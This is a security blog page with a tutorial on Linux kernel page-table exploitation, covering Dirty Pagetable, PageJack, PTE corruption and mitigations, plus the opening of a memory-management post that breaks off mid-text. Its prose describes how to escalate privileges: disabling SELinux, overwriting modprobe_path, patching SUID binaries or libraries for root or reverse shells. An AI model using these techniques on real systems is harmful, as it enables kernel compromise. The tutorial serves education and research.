sam4k

Kernel Exploitation Techniques: Turning The (Page) Tables

sam4k — Wed, 07 May 2025 14:01:41 +0000

Two posts in the space of two weeks?! What on earth has gotten into me. Well, I figured I ought to get into the OffensiveCon spirit and get another post on exploitation out there.

So today we’ll be looking at (user) page table exploitation. If you’ve been keeping up with some of the great kernel exploitation research put out there lately (of which I will be sharing plenty of in this article, don’t worry!), you might have noticed a trend in techniques targeting page tables in order to gain powerful read/write primitives.

The goal for this post is to provide some insight into why targeting page tables can be such a powerful exploitation technique. We’ll do a primer on how paging works in Linux, to give us some context, before looking at how we can gain control of page tables in the first place, how to exploit them for privilege escalation and mitigations to be aware of.

As I mentioned, there’s a plethora of great research out there, so where relevant I’ll be linking to them so you can take a deeper dive into specific topics or approaches. At the end of the post I’ll include a section grouping all the relevant public research together.

So without further ado, let’s get stuck in!

Paging Primer
Exploitation
Mitigations
- Physical KASLR
- Read-Only Memory
Resources
Wrapping Up

Paging Primer

he’s looking at pages, get it?

Before we get into the nitty gritty of page tables in kernel exploitation, we should probably quickly cover what pages tables are so we understand why exploiting them is so powerful.

Let’s pick up where we left off with my three-part series on virtual memory; if you’re not familiar with concepts like physical vs virtual memory or the user virtual address space, feel free to check out those posts for a recap before heading into this section.

Okay, so, we have this general idea of the virtual memory model. Let’s take the simple example of running a program, which we’ve touched on previously:

First, the program itself is stored on disk and must be read
It is loaded into RAM, where the physical address in memory is mapped into our process’ virtual address space
This “mapping” means that when our program accesses a mapped virtual address, it will be translated into the appropriate physical address so the memory can be accessed

Page tables are what facilitate the translation of virtual to physical addresses. Why “page” tables? Recall that virtual memory is divided into “pages” which are PAGE_SIZE (typically 4096) bytes of contiguous virtual memory; in this case it defines the granularity at which chunks of physical memory are mapped into the virtual address space.

Each process has its own page tables, as does the kernel, to track what parts of its virtual address space are mapped to what parts of physical memory. So how does this work?

Page tables are organised into a hierarchy, or levels, with each table containing pointers to the next level. At the lowest level, the table contains pointers to a page of physical memory. Linux currently supports up to 5 levels[1]:

Page Global Directory (PGD): Each entry in this table points to a P4D
Page Level 4 Directory (P4D): Each entry in this table points to a PUD
Page Upper Directory (PUD): Each entry in this table points to a PMD
Page Middle Directory (PMD): Each entry in this table points a PT
Page Table (PT): Each entry (PTE) points to a page of physical memory

Note that a lot of systems may still use 4 level page tables. In the event a page table level isn’t used (i.e. P4D is only used for 5 level page tables), it is “folded” AKA skipped.

Okay, that sounds fairly straight forward right? And to add to the page-ception, each of these tables is a PAGE_SIZE bytes. But how does these facilitate address translation?

Overview of page table structure (Linux x86_64) by Hiroki Kuzuno, Toshihiro Yamauchi [1]

That’s where this helpful diagram comes in! Let’s unpack it. In the centre we can see a 4-level page table hierarchy, with the PGD on the left and the final page on the right.

Looking up, we have see the bits that make up a 64-bit x86_64 virtual address. We can see that the offsets into each table level, and the final page, are actually stored in the virtual address! Isn’t that neat?!

There’s a few extra details to note here. First, keen readers might notice that we’re actually only using the lower 47 bits of the virtual address! What’s that Sign extended portion? As addresses are canonically 64-bits (i.e. that’s how they’re treated and handled), the remaining bits 48-63 are sign extended (i.e. copy) bit 47.

This bit is important, as it denotes if an address is a low address (for userspace) or a high address (for the kernel virtual address space). Don’t believe me? Compare a kernel and userspace address on your x86_64 machine and you’ll always see those bits set/unset.

Some more useful bits (figuratively speaking) worth mentioning are that:

Page table entries aren’t just pointers to the next level/memory, they can also contain important metadata like permissions (spoiler alert).
It’s not just PTEs that can point to physical memory. There’s a concept of huge pages, whereby a PMD points to a huge page of physical memory (a bit out of scope for this).
The kernel’s page tables are setup at boot time. A process’ page tables are setup when it’s created. It used to be the case that the kernel’s page tables were copied into each process’ tables (remember, they span a mutually exclusive virtual address range).
However, since Meltdown (2018) and speculative execution side-channely shenanigans, Kernel Page Table Isolation (KPTI, [CONFIG_PAGE_TABLE_ISOLATION](https://cateee.net/lkddb/web-lkddb/PAGE_TABLE_ISOLATION.html) / [CONFIG_MITIGATION_PAGE_TABLE_ISOLATION](https://cateee.net/lkddb/web-lkddb/MITIGATION_PAGE_TABLE_ISOLATION.html)) was introduced. This removes the kernel mappings from userspace, switching to a separate page table will all the mappings when entering “kernel mode” (i.e. during a syscall, interrupt).

I’ll touch on all of this in much more detail in the next instalment of my memory management linternals series, but there’s also plenty of great resources out there[1][2].

Exploitation

Alright, now we’re getting to the fun part! Given what we know about paging in the Linux kernel, we can start to understand why page tables present such a powerful exploitation target.

Gaining control over even a single PTE (or PMD entry, as this could be a huge page) means not just having control over the access permissions for that virtual memory mapping but also the physical address it maps to.

When we think of Kernel Address Space Layout Randomisation (KASLR), we’re typically thinking about the virtual address of the kernel. Physical KASLR is slightly different and may not always be present (in the case of upstream aarch64) or weaker.

Therefore, control over a PTE belonging to our process essentially grants us an arbitrary physical address read and write, granting control over the kernel while also bypassing mitigations that hinder other techniques.

But of course, this is all easier said than done! First we have to control a PTE…

So we have a target in mind for corruption: page tables. In order to realise that goal, we need to consider:

How page tables are allocated by the kernel, so we know what kind of corruption primitive we need to corrupt them
Are there generic approaches to gain a page table corruption primitive?
How do we want to leverage our page table corruption for local privilege escalation?

User Page Table Allocation

If we want to consider memory corruption, we need to understand how page tables are allocated. As the kernel’s page tables are setup during boot-time, this section will just focus on how user page tables (i.e. for a userspace process) are allocated.

I’ll save the deep dive for linternals and cut to the chase. User page tables are by default allocated on demand: whenever a virtual address is accessed (read or written) and has a valid physical memory mapping, any missing page tables will be allocated and populated.

We can use some maths to guarantee this. Recall that each page table is PAGE_SIZE bytes. On a 64-bit system, entries are 64-bits. That means each page table has 4096 / 8 = 512 entries. We can then work out the virtual address range of each page table level:

PTE-level table: Each of the 512 entries points to PAGE_SIZE bytes of physical memory. Therefore it spans 512 x 4096 = 2097152 = 0x200000 = 2MB.
Page Middle Directory (PMD): Each entry spans 2MB. An entry may point to a PT or a 2MB block of memory (a huge page). The PMD itself spans 0x40000000 = 1GB
This continues with the PUD spanning 512GB, the PGD spanning 256TB.

We can infer from this that the virtual address of the first entry of a PTE-level table is aligned to 0x200000. If we mmap() a page of anonymous memory to a fixed address, aligned to this value we can determine a few things:

This virtual address’ mapping will be the first entry in its PTE-level table
If there haven’t been any other mappings in this page table (i.e. for the next 0x200000 - 0x1000 bytes), then this page table hasn’t been allocated yet. Thus, accessing (read/writing) this mapping will cause it to be allocated.

Another quirk to note is that mmap() can be passed the MAP_POPULATE flag to populate the necessary page tables at the time the mapping is created.

With that mildly relevant tangent out of the way, let’s look at some code. Due to the tight integration with the hardware, some of the page table handling code is architecture specific. For x86_64 our trail starts here:

gfp_t __userpte_alloc_gfp = GFP_PGTABLE_USER | PGTABLE_HIGHMEM;

pgtable_t pte_alloc_one(struct mm_struct *mm)
{
	return __pte_alloc_one(mm, __userpte_alloc_gfp);
}

arch/x86/mm/pgtable.c

Note the GFP flags used: GFP_PGTABLE_USER | PGTABLE_HIGHMEM. A few calls deeper we then get to the asm-generic implementation, pagetable_alloc_noprof():

/**
 * pagetable_alloc - Allocate pagetables
 * @gfp:    GFP flags
 * @order:  desired pagetable order
 *
 * pagetable_alloc allocates memory for page tables as well as a page table
 * descriptor to describe that memory.
 *
 * Return: The ptdesc describing the allocated page tables.
 */
static inline struct ptdesc *pagetable_alloc_noprof(gfp_t gfp, unsigned int order)
{
	struct page *page = alloc_pages_noprof(gfp | __GFP_COMP, order);

	return page_ptdesc(page);
}

include/asm-generic/pgalloc.h (used for PTs, PMDs and PUDs)

As we can see user page tables are allocated using the page allocator, with GFP flags GFP_PGTABLE_USER | PGTABLE_HIGHMEM | __GFP_COMP. Okay, one step closer!

Now we know we’re dealing with the page allocator. This means that if we want to use a memory corruption primitive to control a page table, we need to have some control over a similarly allocated page from the same allocator. Let’s explore this a bit:

GPUAF slides by PAN ZHENPENG & JHENG BING JHONG

Above is a diagram showing some page allocator internals. Recall that the page allocator manages chunks of physically contiguous memory by order, where the size of the chunk is 2order * PAGE_SIZE.

Free memory chunks are managed by the free_area list, whose index is the order of the free chunks of memory it manages. Each order then has a free_list for each of the MIGRATE_TYPES, which points to the actual memory chunks. Working our way back you’ll then notice each zone has it’s own free_area list… Not to mention each CPU maintains its own per-CPU page cache… So yeah, that’s a lot.

This means when we’re doing any kind of page allocator-level corruption we need to be aware of all the variables: the CPU cache, zone, migrate type etc.

In our situation: Our page table is PAGE_SIZE bytes, so a single order 0 page. The GFP flags determine the zone and migrate type. Let’s quickly walk through those:

GFP_PGTABLE_USER after peeling back the macros is __GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_ZERO | __GFP_ACCOUNT. No __GFP_RECLAIMABLE|__GFP_MOVABLE means no MIGRATE_MOVABLE[3].
PGTABLE_HIGHMEM is effectively 0 unless CONFIG_HIGHMEM is set.
__GFP_COMP is for compound pages[4], but doesn’t effect our zone/migrate type.

So to sum it all up: page tables are order-0 pages allocated by the page allocator, from ZONE_NORMAL, MIGRATE_UNMOVABLE.

Page Table Corruption?

Okay, we know what page tables are, why they’re powerful targets for exploitation and now we also know how user page tables are allocated - so how do we get control of one?!

The vulnerability research gods are fickle ones and we’re often at the whims of the primitives we’re given. So let’s explore a few cases and how we might leverage them to get control of a page table.

Page-Level Primitives

By far the “easiest” way would be if we had a nice order-0 page use-after-free (UAF), with suitable zone and migrate types. In this scenario, we could do some classic memory fengshui to have our page reallocated as a page table.

Even if it wasn’t an order-0 page, due to the buddy algorithm, if we exhaust the order-0 pages the allocator will split order-1 pages, if they’re exhausted then order-2 and so on. A similar technique could be used to exploit a page allocator level out-of-bounds write (OOBW), by having our OOBW source page allocated adjacent to our page table.

I thought I’d share some cool public research demonstrating this, funnily enough page-level UAFs aren’t too common, so both examples are from GPU bugs:

GPUAF - Two ways of Rooting All Qualcomm based Android phones (aarch64)
The Way to Android Root: Exploiting Your GPU On Smartphone (aarch64)

What About Other Primitives?

But what if we don’t have a nice page-level UAF? What if we’ve got a run of the mill SLAB allocator-level UAF? Is there any hope for us?! Yes!

As an avid reader of my linternals series, I’m sure you’ll remember that the slabs used by the SLAB allocator are in fact themselves allocated by the page allocator!

Therefore, if our UAF object is within a slab, perhaps we can cause this slab to get freed, returned to the page allocator and reallocated as a user page table?! We’d need to be mindful of the slabs order (aka size) and what write primitives we can get with our UAF in order to corrupt the page table’s contents, but it’s certainly do able.

How do I know? Because this is the crux of the Dirty Pagetable technique published by @NVamous back in 2023. This writeup details pivoting several vulnerabilities into page UAFs in order to gain control over user page tables, so check it out for more details!

In a similar vein, PageJack was published in 2024 (Phrack article, BlackHat slides) by Jinmeng Zhou, Jiayi Hu, Wenbo Shen & Zhiyun Qian. This technique also aims to provide a generic approach to gain a page UAF, by pivoting our initial primitive to induce the free of specific “bridge objects” which when freed cause a page UAF.

Below are some more writeups demonstrating these techniques:

“Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup” by @ptrYudai (x86_64) (2023)
“Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques” by @notselwyn expands on the Dirty Pagetable technique (x86_64) (2024)

Exploiting A Page UAF?

The pieces are finally aligned: we know what page tables are, why they’re a big deal and now we even know how to get control of them … but what do we do with all this power?!

As I mentioned earlier, we’re often at the whims at whatever bug the VR gods have tossed our way, so each bug is going to have its own quirks. Maybe you have an 8 byte arbitrary write or maybe you only have control over a single bit. While I can’t cover all eventualities, hopefully this section provides enough information to figure it out.

So we have a, either directly or through some technique, gained a page UAF, had that page reallocated as a user page table (for our process) and as a result have the means to corrupt all or some portion of the page table - what’s next?

PT Entries

First things first, we want to understand what we’re corrupting - what does our page table actually contain? Sure, it maps a specific page of virtual memory to a physical address, but what does this involve?

x86_64 PT Entry from OSDev.wiki

Above is a diagram of what an 8 byte PT entry looks like on x86_64. Here M is the maximum physical address bit, i.e. how many bits are used for addressing. As we touched one earlier, this isn’t actually 64, but a small value such as 47.

So this is a pretty smart use of space. As we know, these entries map pages in memory (i.e. PAGE_SIZE bytes of memory), so all addresses are page aligned. With a page size of 0x1000, this means the lower 0-11 bits are always going to be zero, so they can be used for metadata! Similarly, anything above the maximum address bit can be used for metadata.

Remember, this user page table corresponds to a portion (a 2MB portion specifically) of our processes’ virtual address space. So we’re interested in:

The address bits, which control the physical page in memory that the virtual address corresponding to this entry will map to when accessed by our process.
The permission bits, particularly if we map a read-only file (such as an SUID binary or system library) into the virtual address range covered by this page table.

Huge Pages

As we’ve touched on, PMDs and PUDs are allocated the same way as PTs - via the page allocator. So it is also feasible we could target one of these for our page-UAF.

Albeit, in their default usecase, this would be less practical than corrupting a PT. A PT would let us direct a virtual address to an arbitrary physical address, but PMD and PUD entries point to other tables … Apart from huge pages!

x86_64 PUD, PMD and PT Entry from OSDev.wiki

The above diagram shows the formatting for x86_64 PUD, PMD and PT entries. Both the PUD and PMD entries include a Page Size (PS) attribute. If this bit is set, it is treated as mapping to a huge page of physical memory, who size is appropriate for the page-level.

As we covered earlier, for a PMD this is 2MB and for a PUD it’s 1GB. As the physical addresses are aligned to the value of the physical mapping, we can see the PMD entry has even less address bits than the PT entry and the PUD even less than the PMD.

Going For A Walk

So far this has been all quite abstract, so, if you’ll indulge me, let’s go for a quick (page table) walk. We’ll take all the paging internals we’ve picked up so far to do some debugging in order to get some hands on and confirm what we’ve learned.

For our little walk, I’m going to use the following program to setup an interesting virtual address space to explore via kernel debugging:

#include 
#include 
#include 
#include 
#include 
#include 

#define PAGE_SIZE (0x1000UL)
#define PT_SIZE (512 * PAGE_SIZE) // 0x200000
#define PMD_SIZE (512 * PT_SIZE)  // 0x40000000
#define PUD_SIZE (512 * PMD_SIZE) // 0x8000000000
#define PGD_SIZE (512 * PUD_SIZE) // 0x1000000000000

int main()
{
    int fd = open("test.txt", O_RDONLY);

    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE, 0x1000, PROT_READ, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE + PAGE_SIZE, 0x1000, PROT_READ, MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, fd, 0);

    getchar(); // pause program so i can set a bp to trigger on the next mmap()
    mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    return 0;
}

Note: MAP_POPULATE is used to make sure the tables are populated on mmap()ing them

The aim of this little program is to create three mappings, with slightly different permissions and attributes, at a fixed location. Why a fixed location?

Because as we’ve learned, the virtual address space is directly reflected by it’s page tables. So by using a fixed address we can calculate exactly which PT our page entries will be.

To make this a little easier, I created some macros to define the size each page table level spans. So, as the virtual address space is reflected directly by the page tables, we know that virtual address 0x0 is going to be mapped by PGD[0][0][0][0] - where the first index is the PGD entry, then that PUD entry, that PMD entry and finally that PT entry.

So if we map at fixed address PUD_SIZE + PMD_SIZE + PT_SIZE we’re offsetting it by example one PUD, one PMD and one PT. So we should find it at PGD[1][1][1][0].

We can also do it the technical way and explore the bits of the address. PUD_SIZE + PMD_SIZE + PT_SIZE == 0x8040200000. Let’s check out the bits:

Bit:  63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32
Val:   0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0

Bit:  31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10  9  8  7  6  5  4  3  2  1  0
Val:   0  1  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0

In the paging primer earlier we showed that the entry offsets for the PGD, PUD, PMD, PT were stored in bits 39-47, 30-38, 21-29 and 12-20 respectively. Here we can see those values correspond to 1, 1, 1 and 0. The same as our previous guess!

Note that the next two mappings are each offset by PAGE_SIZE, i.e. one PT entry, so they should form 3 contiguous PT entries.

This is all still theoretical though so let’s put out money where our mouth is. I set up a kernel debugging environment using gdb and x86_64 QEMU. The plan is to:

Run this program on the guest
When it pauses at getchar(), set a breakpoint in gdb at vm_area_alloc(mm)
Continue the program, hit the breakpoint. We now, lazily, have a reference to our processes mm_struct which contains a pointer to its PGD. We can now walk our PGD and find out entries!

And, just like that we can dump our processes PGD:

(gdb) x/10gx mm->pgd
0xffff888106b50000:     0x8000000100172067      0x8000000102c9b067
0xffff888106b50010:     0x0000000000000000      0x0000000000000000
0xffff888106b50020:     0x0000000000000000      0x0000000000000000

Great, so far so good. We can see PGD[1] is populated with 0x8000000102c9b067. To find the address of the PUD this entry points to, we need to clear the metadata. This, for us, is bits 0:11 and 48:63. We can remove this with a simple mask: 0x8000000102c9b067 & 0x0000FFFFFFFFF000 = 0x102C9B000.

Awesome, so now we can move onto our PUD…

(gdb) x/10gx 0x102C9B000
0x102c9b000:    Cannot access memory at address 0x102c9b000

Ah wait, that’s a physical address right, and gdb is dealing with virtual addresses. Not to worry! Fortunately, the kernel virtual address space includes a direct mapping of all physical memory (physmap). For x86_64 this at __PAGE_OFFSET, 0xffff888000000000.

Sooo if that’s the kernel virtual address mapped to the start of physical memory, we just need to offset that by our physical address and we should see our PMD…

(gdb) x/2gx (0xffff888000000000 + 0x102c9b000)
0xffff888102c9b000:     0x0000000000000000      0x000000010436d067

Voila! And again, as expected, we have our entry at PGD[1][1]. Let’s keep going:

(gdb) x/2gx (0xffff888000000000 + (0x000000010436d067 & 0x0000FFFFFFFFF000))
0xffff88810436d000:     0x0000000000000000      0x0000000101346067

Now we’re into the PMD and as expected, we see PGD[1][1][1] populated. The next step is the PT, where we should see three entries with slightly different permissions:

(gdb) x/4gx (0xffff888000000000 + (0x0000000101346067 & 0x0000FFFFFFFFF000))
0xffff888101346000:     0x8000000107422067      0x80000000034ff225
0xffff888101346010:     0x800000010743c025      0x0000000000000000

And just like that we’ve walked our mm’s PGD all the way down to a specific PT, containing our 3 mappings: R/W anonymous mapping, RO anonymous mapping and finally a RO file. Sweet!

I’ll leave the examining of the various attributes, using the PTE diagram from the previous section, as an exercise to any interested readers, as I fear I’ve sidetracked enough. The main goal of this little adventure is to demonstrate how you can get some hands on debugging and poke around to help build your understanding, as it can be vital when working on complex exploitation techniques like this!

Now, where were we - weighing up our options for exploitation if we have some level of control over a page table…

Approaches

So, depending on our primitive, here a couple of options we might consider:

Overwriting the address bits (and maybe Page Size bit for PUD/PMD entries) to gain arbitrary physical address R/W (note, we’ll discus phys KASLR later).
Overwriting permissions bits to gain R/W on a privileged file that is mapped into our processes virtual address space as read-only.

Using our kernel AAW we could: disable SELinux, using one of the techniques outlined here, such as overwriting the selinux_state singleton[3][4]; patch the kernel to gain root (e.g. setresuid(), setresgid())[5][6]; overwrite modprobe_path because that’s sometimes still a thing[7]; following the linked lists of tasks from [init_task](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched/task.h#L58) to elevate the privilege of your own [cred](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/cred.h#L111)s or forge init’s etc. The world is our oyster (if our primitive is flexible enough…)!

As for files we might want to target, we could: patch shared libraries used by privileged processes to gain a reverse shell[8][9][10]; patch SUID binaries to gain a privileged shell etc.

On Caching

Before we get giddy with power, beyond the limitations of our primitive, there a few other things to consider: mitigations (which I’ll cover in the next section) and caching.

So far we’ve covered paging at a reasonably high level: the process of translating a virtual address to the correct physical address involves walking the appropriate page tables using the bits found in the virtual address.

This address translation is offloaded to the hardware and is the job of the Memory Management Unit (MMU). As you might imagine, this can get computationally expensive when you scale things up and also inefficient if we’re constantly accessing the same pages of memory.

To address this, the hardware makes use of various caches, storing address translations (the primary cache for this being the Translation Lookaside Buffer (TLB)) and pages.

If we start messing with page table entries or pages, in order for the hardware to actual see these changes, we need to flush the appropriate caches so they’re updated with our version.

Of the write-ups I’ve mentioned so far, the Dirty Pagetable article has a section on this for aarch64 and Flipping Pages article has a section rel to x86_64.

Mitigations

Alright, we’ve had our fun, now it’s time to face reality: mitigations. Of course, one of the perks of page table exploitation is that it sidesteps more common mitigations: virtual KASLR, CFI, doesn’t need modprobe_path, random kmalloc caches and other heap mitigations; not to mention the permissions setup by page tables to protect memory acceses via virtual addresses. However, that’s not to say there’s nothing to worry about.

Physical KASLR

As I mentioned earlier, usually when we’re talking about Kernel Address Space Layout Randomisation (KASLR), we’re referring to kernel virtual address randomisation. However, as we’re dealing with physical addresses, we’re interested in physical KASLR.

[CONFIG_RANDOMIZE_BASE](https://cateee.net/lkddb/web-lkddb/RANDOMIZE_BASE.html) is the kernel config option that enables randomising the address of the kernel image (KASLR). Below is the description for the x86_64 option:

In support of Kernel Address Space Layout Randomization (KASLR), this randomizes the physical address at which the kernel image is decompressed and the virtual address where the kernel image is mapped, as a security feature that deters exploit attempts relying on knowledge of the location of kernel code internals.

On 64-bit, the kernel physical and virtual addresses are randomized separately.

Now, let’s look at the aarch64 description:

Randomizes the virtual address at which the kernel image is loaded, as a security feature that deters exploit attempts relying on knowledge of the location of kernel internals.

As far as I understand it, there is no upstream support for physical KASLR on aarch64. That said, if you’re on Android, you’re not out of the woods yet - Samsung have their own physical KASLR implementation, so don’t stop reading just yet.

For x86_64, the kernel’s physical base address is aligned to [CONFIG_PHYSICAL_START](https://cateee.net/lkddb/web-lkddb/PHYSICAL_START.html) (default being 0x1000000). However, the physical address alignment can be explicitly defined by [CONFIG_PHYSICAL_ALIGN](https://cateee.net/lkddb/web-lkddb/PHYSICAL_ALIGN.html), which is typically set to 0x200000 (which is the minimum value on x86_64).

Sooo how we approach this is going to be dependent on our primitive and whether we have control of a PT, PUD, PMD etc. But failing any context specific leaks, the most straightforward approach is simply brute forcing the available physical memory, taking advantage of alignment restrictions, reading the possible base addresses for known signatures either by updating PT entries or mapping huge pages of physical memory and doing it that.

Read-Only Memory

Another mitigation that can thwart our page-level shenanigans is the use of read-only memory. But Sam, I hear you ask, we’re dealing directly with physical addresses here, who’s going to stop us?! As we’ve mentioned, typically these protections are done during virtual address translation, but we’re bypassing that, so what gives?

An example of this is Samsung’s Real-time Kernel Protection (RKP), a hypervisor implementation which is part of Samsung KNOX. I don’t want to get too off track here, but essentially the hypervisor runs at a higher privilege level than even the kernel.

Moreover, it uses a 2 stage address translation to control how the kernel (and thus we) see physical memory. This essentially allows the hypervisor to mark memory as read-only so that even with our physical address read/write, it can still be caught by the hypervisor as it’s operating at a higher privilege. This is a gross simplification, so if you’re interested in reading more, checkout the awesome Samsung RKP Compendium.

This can in turn be used to protect critical data structures such as SLAB caches (e.g. cred_jar), global variables, kernel page tables etc.

Note this isn’t currently used (afaik) to protect user page tables, but it does narrow down the options available when exploiting the physical address read/write.

Resources

Below is a list of all the resources I’ve linked throughout the articles and any extras that are relevant to the topic of page table exploitation (if you think I’ve missed any, lmk!):

Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel by @NVamous (2023) (aarch64) technique overview with 3 examples
“Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup” by @ptrYudai (2023) (x86_64) exploit write-up
“Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques” by @notselwyn (2024) (x86_64) exploit write-up that expands on the Dirty Pagetable technique, covers phys KASLR bypass, cache flushing
PageJack (Phrack article, BlackHat slides) (2024) technique overview
GPUAF - Two ways of Rooting All Qualcomm based Android phones (2024) (aarch64) exploit slides
The Way to Android Root: Exploiting Your GPU On Smartphone (2024) (aarch64) exploit slides
CVE-2022-22265 Samsung npu driver (2024) (aarch64) exploit write-up that includes bypasses for Samsung DEFEX
Mali-cious Intent: Exploiting GPU Vulnerabilities (CVE-2022-22706 / CVE-2021-39793) (2025) (aarch64) Mali GPU exploitation; demonstrates injecting hooks and payloads into read-only shared libraries

RE internals and more background reading:

Page Tables - Linux Kernel Docs are a good place to start on fundamentals
Checkout my linternal series for rundowns on page allocators and mm basics
A Quick Dive Into The Linux Kernel Page Allocator (2025) is a great look into the kernel’s page allocator

Wrapping Up

Boom, we did it! This has been a fun one to write, hopefully it’s, if not fun, been a helpful read for anyone curious about the current trend of page table exploitation.

It’s part of the broader cat and mouse game of security research, as mitigations catch up and become more widespread, attackers need to get more creative in bypassing or circumventing them completely. Often, this means going deeper and deeper into the internals. As we’ve seen, by exploiting page tables and using physical memory addressing, we’re essentially able to operate “under” the purview of traditional mitigations, such as the permission accesses done at the virtual address level.

That said, it’s not quite the wild west, as, while not wide spread, mitigations for these techniques do exist. So I wonder where the next stop will be in this mitigations race!

If you’re interested in digging deeper into page table internals, specifically with regards to kernel code and implementation, I’ll be touching on that in the next part of my mm series.

As always feel free to @me (on X, Bluesky or less commonly used Mastodon) if you have any questions, suggestions or corrections :)

Linternals: Exploring The mm Subsystem via mmap [0x02]

sam4k — Fri, 25 Apr 2025 15:17:34 +0000

Welcome back! Last time I left us on a bit of a cliffhanger, rolling the credits just as we were getting into the thick of it, so I’ll keep the intro brief.

The aim of this series is to explore the inner workings of the Linux kernel’s memory management (mm) subsystem by examining how this simple program is implemented:

#include 

int main()
{
    void *addr;

    addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    *(long*)addr = 0x4142434445464748;

    munmap(addr, 0x1000);
    return 0;
}

While I’m making up the scope of this series as I go (seems fine), the general idea is to cover the mapping, writing and unmapping of memory in detail as the kernel sees it.

In the first part of the series we covered:

What memory management is and a brief overview of the kernel’s mm subsystem
What our simple program does from the user’s perspective and how it interacts with the kernel (it’s only like 2 syscalls, how much could there be to cover…)
The start of our journey: how memory is mapped via the mmap() system call - argument marshalling, fetching the mm_struct, a bit of security, locking - right up until the actual implementation in do_mmap() anyway (sorry, that really was a cliffhanger)

So without further ado, let’s dive back into how (anonymous) memory is mapped via mmap()!

Mapping Memory (cont.)
Next Time

Mapping Memory (cont.)

Broadly speaking, there are 3 things happening in our program: mapping some anonymous memory, writing to it and then unmapping it. Currently, we’re digging into the first part:

addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

Let’s quickly recap how deep in the mm subsystem we are, since making our mmap(2) system call from our userspace program. Using gdb we can set a breakpoint on do_mmap(), which is where we left off, and check the backtrace:

(gdb) bt
#0  do_mmap (file=file@entry=0x0 , addr=0, len=4096, prot=3, flags=34, vm_flags=vm_flags@entry=0, pgoff=0, 
    populate=0xffffc90001a17e80, uf=0xffffc90001a17ea0) at mm/mmap.c:1215
#1  0xffffffff8162aabc in vm_mmap_pgoff (file=file@entry=0x0 , addr=, len=, 
    prot=, flag=, pgoff=) at mm/util.c:556
#2  0xffffffff816a4d7c in ksys_mmap_pgoff (addr=0, len=4096, prot=3, flags=34, fd=, pgoff=0) at mm/mmap.c:1427
#3  0xffffffff810a894f in __do_sys_mmap (addr=0, off=, len=, prot=, flags=, 
    fd=) at arch/x86/kernel/sys_x86_64.c:93
#4  0xffffffff8100507f in x64_sys_call (regs=regs@entry=0xffffc90001a17f58, nr=nr@entry=9) at arch/x86/entry/syscall_64.c:29
#5  0xffffffff844328b1 in do_syscall_x64 (regs=0xffffc90001a17f58, nr=) at arch/x86/entry/common.c:51
#6  do_syscall_64 (regs=0xffffc90001a17f58, nr=) at arch/x86/entry/common.c:81
#7  0xffffffff84600130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121

backtrace for our program’s mmap() call (on a 6.11.5 kernel)

So far these functions have mostly been sanitisting arguments, doing necessary security checks and taking the all important [mmap_write_lock_killable(mm)](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117).

Before we continue where we left off, about to dive into [do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3410), I’m going to touch on some key background which will provide important context for the rest of the post!

What Are Mappings?

We probably shouldn’t go much further down the memory mapping rabbit hole without first covering what a mapping is, or at least how the kernel represents them.

When we call [mmap()](https://man7.org/linux/man-pages/man2/mmap.2.html) in our userspace program, we’re looking to “map” some memory into our virtual address space. This could be a file or some anonymous memory (aka physical memory allocated for us to use), which can then be accessed via a virtual address in our processes’ virtual address space.

So a mapping in this context is essentially a virtual address range which is mapped to some physical memory. We can explore a processes mappings via procfs. Let’s see if we can find our programs 0x1000 byte mapping:

$ cat /proc/91280/maps
00400000-00401000 r--p 00000000 00:2b 12253872                           mm_example
00401000-0047c000 r-xp 00001000 00:2b 12253872                           mm_example
0047c000-004a4000 r--p 0007c000 00:2b 12253872                           mm_example
004a4000-004a9000 r--p 000a3000 00:2b 12253872                           mm_example
004a9000-004ab000 rw-p 000a8000 00:2b 12253872                           mm_example
004ab000-004b1000 rw-p 00000000 00:00 0 
15b3e000-15b60000 rw-p 00000000 00:00 0                                  [heap]
7f556e60a000-7f556e60b000 rw-p 00000000 00:00 0 
7f556e60b000-7f556e60d000 r--p 00000000 00:00 0                          [vvar]
7f556e60d000-7f556e60f000 r--p 00000000 00:00 0                          [vvar_vclock]
7f556e60f000-7f556e611000 r-xp 00000000 00:00 0                          [vdso]
7ffd933f4000-7ffd93415000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]

We can see even our simple program has quite a few mappings, but let’s not get distracted! There, at 7f556e60a000, we can see our anonymous mapping! It spans 0x1000 bytes and has the rw permissions we expect, neat!

So now we have a general idea of what a mapping is, how exactly does the kernel represent and manage our processes mappings? Queue [struct vm_area_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664)!

`struct vm_area_struct`

/*
